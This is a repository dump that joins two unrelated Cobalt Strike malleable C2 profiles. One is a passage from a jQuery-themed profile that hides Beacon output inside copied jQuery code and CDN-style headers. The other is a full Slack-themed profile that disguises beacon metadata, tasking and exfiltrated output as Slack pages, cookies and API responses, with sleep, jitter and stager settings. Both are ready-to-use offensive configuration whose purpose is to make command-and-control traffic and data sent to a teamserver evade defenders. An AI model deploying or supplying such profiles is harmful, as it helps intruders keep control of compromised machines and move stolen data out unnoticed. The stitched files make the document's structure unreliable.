532 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
533 | # 2nd Line | |
534 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
535 | # 1st Line | |
536 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
537 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
538 | print; | |
539 | } | |
540 | } | |
541 | } | |
542 | ||
543 | ################################################ | |
544 | ## HTTP POST | |
545 | ################################################ | |
546 | ## Description: | |
547 | ## POST is used to send output to the teamserver | |
548 | ## Can use HTTP GET or POST to send data | |
549 | ## Note on using GET: Beacon will automatically chunk its responses (and use multiple requests) to fit the constraints of an HTTP GET-only channel. | |
550 | ## Defaults: | |
551 | ## uri "/activity" | |
552 | ## Headers (Sample) | |
553 | ## Accept: */* | |
554 | ## Cookie: CN7uVizbjdUdzNShKoHQc1HdhBsB0XMCbWJGIRF27eYLDqc9Tnb220an8ZgFcFMXLARTWEGgsvWsAYe+bsf67HyISXgvTUpVJRSZeRYkhOTgr31/5xHiittfuu1QwcKdXopIE+yP8QmpyRq3DgsRB45PFEGcidrQn3/aK0MnXoM= | |
555 | ## User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1) | |
556 | ## Guidelines: | |
557 | ## - Decide if you want to use HTTP GET or HTTP POST requests for this section | |
558 | ## - Add customize HTTP headers to the HTTP traffic of your campaign | |
559 | ## - Analyze sample HTTP traffic to use as a reference | |
560 | ## Use HTTP POST for http-post section | |
561 | ## Uncomment this Section to activate | |
562 | http-post { | |
563 | ||
564 | set uri "/jquery-3.3.2.min.js"; | |
565 | set verb "POST"; | |
566 | ||
567 | client { | |
568 | ||
569 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
570 | #header "Host" "code.jquery.com"; | |
571 | header "Referer" "http://code.jquery.com/"; | |
572 | header "Accept-Encoding" "gzip, deflate"; | |
573 | ||
574 | id { | |
575 | mask; | |
576 | base64url; | |
577 | parameter "__cfduid"; | |
578 | } | |
579 | ||
580 | output { | |
581 | mask; | |
582 | base64url; | |
583 | print; | |
584 | } | |
585 | } | |
586 | ||
587 | server { | |
588 | ||
589 | header "Server" "NetDNA-cache/2.2"; | |
590 | header "Cache-Control" "max-age=0, no-cache"; | |
591 | header "Pragma" "no-cache"; | |
592 | header "Connection" "keep-alive"; | |
593 | header "Content-Type" "application/javascript; charset=utf-8"; | |
594 | ||
595 | output { | |
596 | mask; | |
597 | base64url; | |
598 | ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
599 | # 2nd Line | |
600 | prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
601 | # 1st Line | |
602 | prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
603 | append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
604 | print; | |
605 | } | |
606 | } | |
607 | } | |
608 | ||
609 | ## Use HTTP GET for http-post section | |
610 | ## Uncomment this Section to activate | |
611 | # http-post { | |
612 | ||
613 | # set uri "/jquery-3.3.2.min.js"; | |
614 | # set verb "GET"; | |
615 | ||
616 | # client { | |
617 | ||
618 | # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; | |
619 | # #header "Host" "code.jquery.com"; | |
620 | # header "Referer" "http://code.jquery.com/"; | |
621 | # header "Accept-Encoding" "gzip, deflate"; | |
622 | ||
623 | # id { | |
624 | # mask; | |
625 | # base64url; | |
626 | # parameter "__cfduid"; | |
627 | # } | |
628 | ||
629 | # output { | |
630 | # mask; | |
631 | # base64url; | |
632 | # parameter "__tg"; | |
633 | # } | |
634 | # } | |
635 | ||
636 | # server { | |
637 | ||
638 | # header "Server" "NetDNA-cache/2.2"; | |
639 | # header "Cache-Control" "max-age=0, no-cache"; | |
640 | # header "Pragma" "no-cache"; | |
641 | # header "Connection" "keep-alive"; | |
642 | # header "Content-Type" "application/javascript; charset=utf-8"; | |
643 | ||
644 | # output { | |
645 | # mask; | |
646 | # base64url; | |
647 | # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values) | |
648 | # # 2nd Line | |
649 | # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"; | |
650 | # # 1st Line | |
651 | # prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */"; | |
652 | # append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"; | |
653 | # print; | |
654 | # } | |
655 | # } | |
656 | # } | |
657 | ||
658 | ## CS 4.0 Profile Variants | |
659 | ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other. | |
660 | ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax: | |
661 | ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant": | |
662 | ## http-get "My Variant" { | |
663 | ## client { | |
664 | ## parameter "bar" "blah"; | |
665 |
0 | #slack profile | |
1 | #used a MS dev group from a 'top slack groups' list | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | ||
11 | #custom cert | |
12 | #https-certificate { | |
13 | # set keystore "your_store_file.store"; | |
14 | # set password "your_store_pass"; | |
15 | #} | |
16 | ||
17 | http-config { | |
18 | # set headers "Server, Content-Type, Cache-Control, Connection"; | |
19 | # header "Content-Type" "text/html;charset=UTF-8"; | |
20 | # header "Connection" "close"; | |
21 | # header "Cache-Control" "max-age=2"; | |
22 | # header "Server" "nginx"; | |
23 | #set "true" if teamserver is behind redirector | |
24 | set trust_x_forwarded_for "false"; | |
25 | } | |
26 | ||
27 | http-get { | |
28 | ||
29 | set uri "/messages/C0527B0NM"; | |
30 | ||
31 | client { | |
32 | ||
33 | # header "Host" "msdevchat.slack.com"; | |
34 | header "Accept" "*/*"; | |
35 | header "Accept-Language" "en-US"; | |
36 | header "Connection" "close"; | |
37 | ||
38 | ||
39 | metadata { | |
40 | base64url; | |
41 | ||
42 | append ";_ga=GA1.2.875"; | |
43 | append ";__ar_v4=%8867UMDGS643"; | |
44 | prepend "d="; | |
45 | # prepend "cvo_sid1=R456BNMD64;"; | |
46 | prepend "_ga=GA1.2.875;"; | |
47 | prepend "b=.12vPkW22o;"; | |
48 | header "Cookie"; | |
49 | ||
50 | } | |
51 | ||
52 | } | |
53 | ||
54 | server { | |
55 | ||
56 | header "Content-Type" "text/html; charset=utf-8"; | |
57 | header "Connection" "close"; | |
58 | header "Server" "Apache"; | |
59 | header "X-XSS-Protection" "0"; | |
60 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
61 | header "Referrer-Policy" "no-referrer"; | |
62 | header "X-Slack-Backend" "h"; | |
63 | header "Pragma" "no-cache"; | |
64 | header "Cache-Control" "private, no-cache, no-store, must-revalidate"; | |
65 | header "X-Frame-Options" "SAMEORIGIN"; | |
66 | header "Vary" "Accept-Encoding"; | |
67 | header "X-Via" "haproxy-www-w6k7"; | |
68 | ||
69 | ||
70 | output { | |
71 | ||
72 | base64url; | |
73 | ||
74 | prepend "<!DOCTYPE html> | |
75 | <html lang=\"en-US\" class=\"supports_custom_scrollbar\"> | |
76 | ||
77 | <head> | |
78 | ||
79 | <meta charset=\"utf-8\"> | |
80 | <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> | |
81 | <meta name=\"referrer\" content=\"no-referrer\"> | |
82 | <meta name=\"superfish\" content=\"nofish\"> | |
83 | <title>Microsoft Developer Chat Slack</title> | |
84 | <meta name=\"author\" content=\"Slack\"> | |
85 | ||
86 | ||
87 | <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id="; | |
88 | ||
89 | append "\"> </script>"; | |
90 | ||
91 | append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\"> | |
92 | ||
93 | ||
94 | <div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\"> | |
95 | <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1> | |
96 | ||
97 | <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\"> | |
98 | Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button> | |
99 | </div> | |
100 | ||
101 | <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\"> | |
102 | We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\"> | |
103 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> • | |
104 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> • | |
105 | <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button> | |
106 | </span> | |
107 | </div>"; | |
108 | ||
109 | print; | |
110 | } | |
111 | } | |
112 | } | |
113 | ||
114 | http-post { | |
115 | ||
116 | set uri "/api/api.test"; | |
117 | ||
118 | client { | |
119 | ||
120 | # header "Host" "msdevchat.slack.com"; | |
121 | header "Accept" "*/*"; | |
122 | header "Accept-Language" "en-US"; | |
123 | ||
124 | output { | |
125 | base64url; | |
126 | ||
127 | append ";_ga=GA1.2.875"; | |
128 | append "__ar_v4=%8867UMDGS643"; | |
129 | prepend "d="; | |
130 | # prepend "cvo_sid1=R456BNMD64;"; | |
131 | prepend "_ga=GA1.2.875;"; | |
132 | prepend "b=.12vPkW22o;"; | |
133 | header "Cookie"; | |
134 | ||
135 | ||
136 | } | |
137 | ||
138 | ||
139 | id { | |
140 | #not sure on this, just trying to blend it in. | |
141 | base64url; | |
142 | prepend "GA1."; | |
143 | header "_ga"; | |
144 | ||
145 | } | |
146 | } | |
147 | ||
148 | server { | |
149 | ||
150 | header "Content-Type" "application/json; charset=utf-8"; | |
151 | header "Connection" "close"; | |
152 | header "Server" "Apache"; | |
153 | header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload"; | |
154 | header "Referrer-Policy" "no-referrer"; | |
155 | header "X-Content-Type-Options" "nosniff"; | |
156 | header "X-Slack-Req-Id" "6319165c-f976-4d0666532"; | |
157 | header "X-XSS-Protection" "0"; | |
158 | header "X-Slack-Backend" "h"; | |
159 | header "Vary" "Accept-Encoding"; | |
160 | header "Access-Control-Allow-Origin" "*"; | |
161 | header "X-Via" "haproxy-www-6g1x"; | |
162 | ||
163 | ||
164 | output { | |
165 | base64; | |
166 | ||
167 | prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\""; | |
168 | append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}"; | |
169 | ||
170 | print; | |
171 | } | |
172 | } | |
173 | } | |
174 | ||
175 | http-stager { | |
176 | ||
177 | set uri_x86 "/messages/DALBNSf25"; | |
178 | set uri_x64 "/messages/DALBNSF25"; | |
